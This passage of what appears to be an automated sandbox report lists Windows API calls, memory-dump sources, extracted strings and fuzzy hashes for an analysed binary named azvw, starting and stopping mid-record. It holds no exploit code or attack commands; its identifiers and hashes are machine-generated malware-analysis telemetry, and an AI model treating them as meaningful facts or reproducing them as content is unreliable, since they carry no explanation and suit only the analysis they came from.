                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0041BAE6
                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0041BAF3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$4B
                                          • API String ID: 2238633743-2289559369
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: --- Press `Q' to quit, or any other key to continue ---$[ %s ]$nircmdc.exe$warning: extra field too long (%d). Ignoring...$warning: filename too long--truncating.
                                          • API String ID: 0-1331371059
                                          APIs
                                          • CreateFileA.KERNEL32(CONIN$,C0000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,004075BA), ref: 00412150
                                          • GetConsoleMode.KERNEL32(00000000,?,?,?,004075BA), ref: 00412166
                                          • SetConsoleMode.KERNEL32(00000000,00000001,?,?,004075BA), ref: 00412173
                                          • ReadFile.KERNEL32(00000000,?,00000001,?,00000000,?,?,?,004075BA), ref: 0041218F
                                          • ReadFile.KERNEL32(00000000,?,00000001,00000001,00000000), ref: 004121BA
                                          • SetConsoleMode.KERNEL32(00000000,?,?,?,004075BA), ref: 004121DD
                                          • CloseHandle.KERNEL32(00000000,?,?,004075BA), ref: 004121E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ConsoleFileMode$Read$CloseCreateHandle
                                          • String ID: CONIN$
                                          • API String ID: 4003642833-3033795042
                                          APIs
                                          • lstrlenA.KERNEL32(?), ref: 0041235C
                                            • Part of subcall function 00412550: CreateMutexA.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00412334), ref: 00412566
                                          • EnterCriticalSection.KERNEL32(00429220), ref: 0041240D
                                          • lstrcmpiA.KERNEL32(00429118,?), ref: 00412428
                                          • LeaveCriticalSection.KERNEL32(00429220), ref: 0041243F
                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00412461
                                          • GetDriveTypeA.KERNEL32(?), ref: 00412493
                                          • EnterCriticalSection.KERNEL32(00429220), ref: 004124BD
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Enter$CreateDriveInformationLeaveMutexTypeVolumelstrcmpilstrlen
                                          • String ID:
                                          • API String ID: 3268418500-0
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,00000100,004231C4,00000001,00000000,00000000,00000103,00000001,?,?,0041B122,00200020,00000000,?,?,00000000), ref: 004191D1
                                          • LCMapStringA.KERNEL32(00000000,00000100,004231C0,00000001,00000000,00000000,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 004191ED
                                          • LCMapStringA.KERNEL32(?,?,00000000,00200020,0041B122,?,00000103,00000001,?,?,0041B122,00200020,00000000,?,?,00000000), ref: 00419236
                                          • MultiByteToWideChar.KERNEL32(?,00000002,00000000,00200020,00000000,00000000,00000103,00000001,?,?,0041B122,00200020,00000000,?,?,00000000), ref: 0041926E
                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,0041B122,00200020,00000000), ref: 004192C6
                                          • LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,0041B122,00200020,00000000), ref: 004192DC
                                          • LCMapStringW.KERNEL32(?,?,0041B122,00000000,0041B122,?,?,0041B122,00200020,00000000), ref: 0041930F
                                          • LCMapStringW.KERNEL32(?,?,?,?,?,00000000,?,0041B122,00200020,00000000), ref: 00419377
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: String$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 352835431-0
                                          APIs
                                            • Part of subcall function 0040F6B0: GetVersion.KERNEL32(004028AB,?,?,ZIPINFOOPT,?,?,?,00401014,?,?,0041492C,020405B8), ref: 0040F6BA
                                          • IsValidSecurityDescriptor.ADVAPI32(?), ref: 00412217
                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00412237
                                          Similarity
                                          • API ID: DescriptorSecurity$DaclValidVersion
                                          • String ID:
                                          • API String ID: 1532089921-0
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 0041A3FA
                                          • GetStdHandle.KERNEL32(000000F4,00423494,00000000,?,00000000,00000000), ref: 0041A4D0
                                          • WriteFile.KERNEL32(00000000), ref: 0041A4D7
                                          Strings
                                          Similarity
                                          • API ID: File$HandleModuleNameWrite
                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                          • API String ID: 3784150691-4022980321
                                          APIs
                                          • CompareStringW.KERNEL32(00000000,00000000,004231C4,00000001,004231C4,00000001,00000000,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000,00000000), ref: 0041CE4D
                                          • CompareStringW.KERNEL32(00000000,74DEDF80,00000000,00000000,0041C6AA,00000000,00000000,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000,00000000), ref: 0041CEB3
                                          • CompareStringA.KERNEL32(00000000,00000000,004231C0,00000001,004231C0,00000001,?,?,00000000,0041C134,00000000,00000000,?,?,?,0040144E), ref: 0041CEC9
                                          • WideCharToMultiByte.KERNEL32(00000000,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000), ref: 0041CF0C
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CF66
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 0041CF7E
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CFD6
                                          • CompareStringA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041CFF4
                                          Similarity
                                          • API ID: ByteCharCompareMultiStringWide
                                          • String ID:
                                          • API String ID: 1117519366-0
                                          APIs
                                          • LCMapStringW.KERNEL32(00000000,00000100,004231C4,00000001,00000000,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000,00000000), ref: 0041D1A7
                                          • LCMapStringA.KERNEL32(00000000,00000100,004231C0,00000001,00000000,00000000,?,?,00000000,0041C134,00000000,00000000,?,?,?,0040144E), ref: 0041D1C3
                                          • LCMapStringW.KERNEL32(00000000,74DEDF80,00000000,00000000,0041C6AA,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000,00000000), ref: 0041D20C
                                          • WideCharToMultiByte.KERNEL32(00000000,00000220,00000000,00000000,00000000,00000000,00000000,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80), ref: 0041D23F
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041D296
                                          • LCMapStringA.KERNEL32(?,?,?,?,00000000,00000000), ref: 0041D2B2
                                          • LCMapStringA.KERNEL32(?,?,?,?,?,00000000), ref: 0041D308
                                          Similarity
                                          • API ID: String$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 352835431-0
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A06D
                                          • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A081
                                          • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A0AD
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004148FC), ref: 0041A0E5
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,004148FC), ref: 0041A107
                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,?,004148FC), ref: 0041A120
                                          • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,?,004148FC), ref: 0041A133
                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0041A171
                                          Similarity
                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                          • String ID:
                                          • API String ID: 1823725401-0
                                          APIs
                                          • HeapAlloc.KERNEL32(00000000,00002020,?,?,?,?,0041767B), ref: 004181FA
                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,?,?,0041767B), ref: 0041821E
                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,?,?,0041767B), ref: 00418238
                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0041767B), ref: 004182F9
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,0041767B), ref: 00418310
                                          Strings
                                          Similarity
                                          • API ID: AllocVirtual$FreeHeap
                                          • String ID: hB$hB$hB
                                          • API String ID: 714016831-3407773006
                                          APIs
                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00412334), ref: 00412566
                                          • InterlockedExchange.KERNEL32(00428D6C,00000000), ref: 00412582
                                          • InterlockedExchange.KERNEL32(00428D6C,00000000), ref: 00412590
                                          • CloseHandle.KERNEL32(00000000), ref: 00412593
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041259C
                                          • ReleaseMutex.KERNEL32(00000000), ref: 004125A3
                                          Similarity
                                          • API ID: ExchangeInterlockedMutex$CloseCreateHandleObjectReleaseSingleWait
                                          • String ID:
                                          • API String ID: 1537229248-0
                                          APIs
                                          • GetStringTypeW.KERNEL32(00000001,004231C4,00000001,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80), ref: 0041A73C
                                          • GetStringTypeA.KERNEL32(00000000,00000001,004231C0,00000001,?), ref: 0041A756
                                          • GetStringTypeW.KERNEL32(00000100,74DEDF80,00000000,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80), ref: 0041A77D
                                          • WideCharToMultiByte.KERNEL32(0041C6AA,00000220,74DEDF80,00000000,00000000,00000000,00000000,00000000,74DEDF80,00000002,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80), ref: 0041A7B0
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 0041A819
                                          • GetStringTypeA.KERNEL32(?,00000100,?,?), ref: 0041A884
                                          Similarity
                                          • API ID: StringType$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 3852931651-0
                                          APIs
                                          • GetStringTypeW.KERNEL32(00000001,004231C4,00000001,?,00000103,00000001,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 004188E5
                                          • GetStringTypeA.KERNEL32(00000000,00000001,004231C0,00000001,?,?,?,00000000,00000001), ref: 004188FF
                                          • GetStringTypeA.KERNEL32(?,?,?,00000000,00200020,00000103,00000001,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 00418933
                                          • MultiByteToWideChar.KERNEL32(0041B122,00000002,?,00000000,00000000,00000000,00000103,00000001,?,0041B122,00200020,00000000,?,?,00000000,00000001), ref: 0041896B
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 004189C1
                                          • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?), ref: 004189D3
                                          Similarity
                                          • API ID: StringType$ByteCharMultiWide
                                          • String ID:
                                          • API String ID: 3852931651-0
                                          APIs
                                          • GetVersionExA.KERNEL32 ref: 0041750C
                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00417541
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004175A1
                                          Strings
                                          Similarity
                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                          • API String ID: 1385375860-4131005785
                                          APIs
                                          • IsValidSecurityDescriptor.ADVAPI32(?,00000000,00000000,?,00000000,0040FA5A,?,?,00000000), ref: 00412726
                                            • Part of subcall function 00412550: CreateMutexA.KERNEL32(00000000,00000001,00000000,?,00000000,00000000,00412334), ref: 00412566
                                          • GetSecurityDescriptorControl.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,74DEE010), ref: 00412747
                                          Similarity
                                          • API ID: DescriptorSecurity$ControlCreateMutexValid
                                          • String ID:
                                          • API String ID: 5382943-0
                                          APIs
                                          • VirtualFree.KERNEL32(000000FF,00000000,00008000,hB,0041841D,hB,74DEDFF0,?,00000000,?,?,004184CF,00000010,00413378,?,?), ref: 0041832C
                                          • HeapFree.KERNEL32(00000000,?,?,004184CF,00000010,00413378,?,?), ref: 00418362
                                          Strings
                                          Similarity
                                          • API ID: Free$HeapVirtual
                                          • String ID: hB$hB$hB
                                          • API String ID: 3783212868-3407773006
                                          APIs
                                          • SetConsoleCtrlHandler.KERNEL32(00412B44,00000001,?,?,?,0040103D,00000002,004076E0,00000002,00428D60,?,?,?,?,?,00401014), ref: 00412AC8
                                          • GetLastError.KERNEL32(?,?,?,0040103D,00000002,004076E0,00000002,00428D60,?,?,?,?,?,00401014,?,?), ref: 00412AF7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ConsoleCtrlErrorHandlerLast
                                          • String ID: v@$v@
                                          • API String ID: 3113525192-2252294108
                                          • Opcode ID: be862bb647b63607e7147e6a5487d70ccdf36829498479ed286d36be58b49362
                                          • Instruction ID: 36fa8ff7c152ed876fc65d5f67174a495ff5afcdeb0d815e8b9c8bd107a64320
                                          • Opcode Fuzzy Hash: be862bb647b63607e7147e6a5487d70ccdf36829498479ed286d36be58b49362
                                          • Instruction Fuzzy Hash: EE219131A155108B8A398F08DA885EAB762ABA1350799422BC805C73B0D6F86CE6C78D
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 427a3472328d7d1c61610fd7d40306d59065ffd795d00f0f890eeb67c1721805
                                          • Instruction ID: 459714ddabeffe01b96583aa82163a16ed5fdc408948e7cab0404e7047e2aba0
                                          • Opcode Fuzzy Hash: 427a3472328d7d1c61610fd7d40306d59065ffd795d00f0f890eeb67c1721805
                                          • Instruction Fuzzy Hash: F57116365002106BDB226A65CC40BEF3A25EBD27A8F250127FC289A2D0DB3DDDC1969C
                                          APIs
                                          • WideCharToMultiByte.KERNEL32(00000000,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,0041C6AA,00000000,00000000,74DEDF80,00000000), ref: 0041CF0C
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CF66
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,00000000,00000000,00000000,00000000), ref: 0041CF7E
                                          • WideCharToMultiByte.KERNEL32(?,00000220,?,?,?,?,00000000,00000000), ref: 0041CFD6
                                          • CompareStringA.KERNEL32(?,?,?,?,?,?,?,?,00000000,00000000), ref: 0041CFF4
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$CompareString
                                          • String ID:
                                          • API String ID: 376665442-0
                                          • Opcode ID: dbaede760fa393ef53ab3c1242556b367d8345edddc8a848cdddf23556fa72f6
                                          • Instruction ID: 9864fccd20358ca3471ff816892f761ab08e69d42232d9cc94e5ed20e2ccf262
                                          • Opcode Fuzzy Hash: dbaede760fa393ef53ab3c1242556b367d8345edddc8a848cdddf23556fa72f6
                                          • Instruction Fuzzy Hash: A821D572900259EBCF228F96CC85DDFBF76FF89750F24811AF91061260D33A8961EB64
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000001,00000000,00000002,00000002,00000002,?,00000002,00428D60,0040114F), ref: 0041AD02
                                          • MultiByteToWideChar.KERNEL32(?,00000009,00428D60,00000002,00000000,00000000,?,00000002,00428D60,0040114F), ref: 0041AD15
                                          • MultiByteToWideChar.KERNEL32(?,00000001,00428D60,00000002,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD61
                                          • CompareStringW.KERNEL32(?,?,00000000,00000002,?,00000000,?,00000000,?,00000002,00428D60,0040114F), ref: 0041AD79
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide$CompareString
                                          • String ID:
                                          • API String ID: 376665442-0
                                          • Opcode ID: 2702ab6cdf56d2763e6d62c6ecf4a2ed95136fa1c4226cc5a579848ba68c566b
                                          • Instruction ID: 96f580f69b9e3dcf2c1ef1fcae33e3ea1998bfe1201ed0f81b595f9675030ecf
                                          • Opcode Fuzzy Hash: 2702ab6cdf56d2763e6d62c6ecf4a2ed95136fa1c4226cc5a579848ba68c566b
                                          • Instruction Fuzzy Hash: DD212932D01659EBCF218FD5DC459DEBFB6FF48360F10412AFA10622A0C3369962DB96
                                          APIs
                                          • GetCPInfo.KERNEL32(?,00000000), ref: 00415485
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Info
                                          • String ID: $
                                          • API String ID: 1807457897-3032137957
                                          • Opcode ID: 206481e3e4300311258317caa61d1883e1de100da41eb334363ef2002a580eda
                                          • Instruction ID: 0d18aeb077521f4644a221a408f67d066500747ada27a7292fb7ec63da0fa870
                                          • Opcode Fuzzy Hash: 206481e3e4300311258317caa61d1883e1de100da41eb334363ef2002a580eda
                                          • Instruction Fuzzy Hash: 0D419C31144698AFEB258B14CD49BFB3FABEB45704F1410E6D189C7252C23D49D8CBAB
                                          APIs
                                          • DosDateTimeToFileTime.KERNEL32(4F020EB0,4F020EB0,?), ref: 0040FC80
                                          • LocalFileTimeToFileTime.KERNEL32(?,?,?,?,0040F775,?,?,?), ref: 0040FC90
                                            • Part of subcall function 0040FCE0: SystemTimeToFileTime.KERNEL32(?,?,00000000,?,?,0040FC29,?,?,00000001), ref: 0040FD9F
                                            • Part of subcall function 0040FCE0: LocalFileTimeToFileTime.KERNEL32(?,?,?,?,0040FC29,?,?,00000001), ref: 0040FDAF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Time$File$Local$DateSystem
                                          • String ID: nircmdc.exe
                                          • API String ID: 906138043-3082794360
                                          • Opcode ID: ac9c37c9d280e7aeeecda865d65c29ca38083135dfc648224f3fac08bf768192
                                          • Instruction ID: 5baf95fb76d08c68963974afa87817b976a97d3decfcf36862cfafa69845cedb
                                          • Opcode Fuzzy Hash: ac9c37c9d280e7aeeecda865d65c29ca38083135dfc648224f3fac08bf768192
                                          • Instruction Fuzzy Hash: 353184B99583045BE224DB14DC46A6773E8FB88704F04493DFD4467391D279ED09CBAA
                                          APIs
                                          • CharToOemA.USER32(00000000,00000000), ref: 004026A9
                                          • OemToCharA.USER32(00000000,00000000), ref: 004026C7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: Char
                                          • String ID: %@
                                          • API String ID: 751630497-2048787947
                                          • Opcode ID: 6e380c911fb415733835f5aa260d4525884f8dd25feb0fab7b4cd8439c7f1fe2
                                          • Instruction ID: b3c2b64b661b7efdf6035ac58ec0d7cccb6eb28b1d05d5fc9c221f85c97273e9
                                          • Opcode Fuzzy Hash: 6e380c911fb415733835f5aa260d4525884f8dd25feb0fab7b4cd8439c7f1fe2
                                          • Instruction Fuzzy Hash: 7201F77B50111033CA1057767D4A89B3B68EAC13727184A3AFD19973D2EABEDC0193B9
                                          APIs
                                          • GetDriveTypeA.KERNEL32(-00000060,0041179E,-00000060,?,00000000), ref: 00411B2E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: DriveType
                                          • String ID: /$:
                                          • API String ID: 338552980-4222935259
                                          • Opcode ID: 1bab22ddc8c8ab6719041f6db9f46d6405986c177cfcddc1ce3f0d567b452f07
                                          • Instruction ID: a07ccfaa741e44cdb586d8d66076ba6bd627a13065fdecee1af11a2a6ee7f3a9
                                          • Opcode Fuzzy Hash: 1bab22ddc8c8ab6719041f6db9f46d6405986c177cfcddc1ce3f0d567b452f07
                                          • Instruction Fuzzy Hash: DAD0175520C3C1ADE3068738855839EBFD24FE6248F08C89CF0CD46197C274868AD32B
                                          APIs
                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00417AFF,?,?,?,00000100), ref: 00417D5F
                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00417AFF,?,?,?,00000100), ref: 00417D93
                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00417AFF,?,?,?,00000100), ref: 00417DAD
                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00417AFF,?,?,?,00000100), ref: 00417DC4
                                          Memory Dump Source
                                          • Source File: 00000032.00000002.2766218833.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000032.00000002.2766202202.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766241134.000000000041E000.00000002.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766259569.0000000000425000.00000004.00000001.01000000.00000007.sdmp
                                          • Associated: 00000032.00000002.2766534078.0000000000428000.00000004.00000001.01000000.00000007.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_50_2_400000_azvw.jbxd
                                          Similarity
                                          • API ID: AllocHeap$FreeVirtual
                                          • String ID:
                                          • API String ID: 3499195154-0
                                          • Opcode ID: 33001df4db496528ad52e2b10be87e81acbf967580db6c9781919396473561c5
                                          • Instruction ID: 19d746281750a9b93ecae615901eefe1d66095e7a60d7e67be2a35289f352c6c
